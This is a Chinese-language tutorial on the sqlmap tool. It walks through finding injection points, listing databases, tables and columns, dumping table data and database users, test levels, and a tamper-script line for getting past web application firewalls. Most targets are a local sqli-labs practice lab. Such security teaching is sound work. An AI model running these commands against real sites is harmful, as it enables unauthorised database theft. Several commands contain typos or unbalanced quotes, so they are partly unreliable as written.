sqlmap详细使用

SQLmap使用详解

SQLmap(常规)使用步骤

1、查询注入点

复制代码
  python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1

2、查询所有数据库

复制代码
  python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs

3、查询当前数据库

复制代码
  python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --current-db

4、查表

复制代码
  python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D xxx --tables

5、查列

复制代码
  python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D xxx -T xxx --columns

6、查数据

复制代码
  python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D xxx -T xxx --dump

目标

指定URL

复制代码
  sqlmap -u "http://www.xxxx.com/vuln.php?id=1" --batch特指一个url
--batch  自动选yes

指定文件

复制代码
  sqlmap -m url.txt  #批量url注入扫描

POST请求

复制代码
  sqlmap -r ab.txt --data=DATA
--data=DATA 指定参数注入 例如:例:-u "xxx?id=1" --data="name=1&pass=2"

level

指需要执行的测试等级,一共有5个等级(1~5)

  • level 1:默认的 level 等级,会测试 GET 和 POST 请求中的参数。
  • level 2:加上level1,还会检查 cookie 里的数据。
  • level 3:加上level2,还user-agent 和 referer 头部也纳入检测范围。
  • level 4~5:加上前几个,会尝试各种 payloads,放过任何潜在的注入点。

脱库

获取数据库

复制代码
   --dbs 获取数据库
Sqlmap-u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs
 --current-db 获取当前数据库
Sqlmap-u http://127.0.0.1/sqli-labs/Less-1/?id=1 --current-db

获取表

复制代码
   Sqlmap-u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D 'security' --tables
 Sqlmap  -u 'http://127.0.0.1/sqli-labs/Less-1/?id=1 -D 'security,mysql' --tables 获取多个数据库的表

获取字段

--columns 获取字段

复制代码
 Sqlmap -u 'http://127.0.0.1/sqli-labs/Less-1/?id=1 -D 'security' -T 'user' --columns 

获取数据

--dump 表中的数据,可以指定具体的库,表,字段,只指定库名可获取库中所有表的数据

复制代码
 sqlmap -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D 'securit'-T 'user' --dump

获取用户

--current-user 获取当前登录数据库的用户名

复制代码
  Sqlmap -u 'http://127.0.0.1/sqli-labs/Less-1/?id=1 --batch   --current-user

--user 获取数据库的所有用户名

复制代码
  sqlmap  -u http://sqli:8001/Less-2/?id=1 --batch --users

WAF绕过

Sqlmap -u http://sqli:8001/Less-2/?id=1 --tamper 'xxx.py'#添对应的加密脚本

相关推荐
Guheyunyi9 小时前
智能守护:视频安全监测系统的演进与未来
大数据·人工智能·科技·安全·信息可视化
Traced back9 小时前
WinForms 线程安全三剑客详解
安全·c#·winform
汉堡包0019 小时前
【网安基础】--内网代理转发基本流程(正向与反向代理)
安全·web安全·php
桌面运维家11 小时前
vDisk VOI/IDV权限管理怎么做?安全方案详解
安全
世界尽头与你12 小时前
(修复方案)kibana 未授权访问漏洞
安全·网络安全·渗透测试
xixixi7777713 小时前
今日 AI 、通信、安全行业前沿日报(2026 年 2 月 4 日,星期三)
大数据·人工智能·安全·ai·大模型·通信·卫星通信
蓝队云计算14 小时前
蓝队云部署OpenClaw深度指南:避坑、优化与安全配置,从能用做到好用
运维·安全·云计算
lingggggaaaa14 小时前
安全工具篇&Go魔改二开&Fscan扫描&FRP代理&特征消除&新增扩展&打乱HASH
学习·安全·web安全·网络安全·golang·哈希算法
Black蜡笔小新16 小时前
国密GB35114平台EasyGBS筑牢安防安全防线,GB28181/GB35114无缝接入
网络·安全·音视频·gb35114
2401_8658548816 小时前
安全为先|咕噜分发平台:一站式App漏洞分析与安全分发解决方案
安全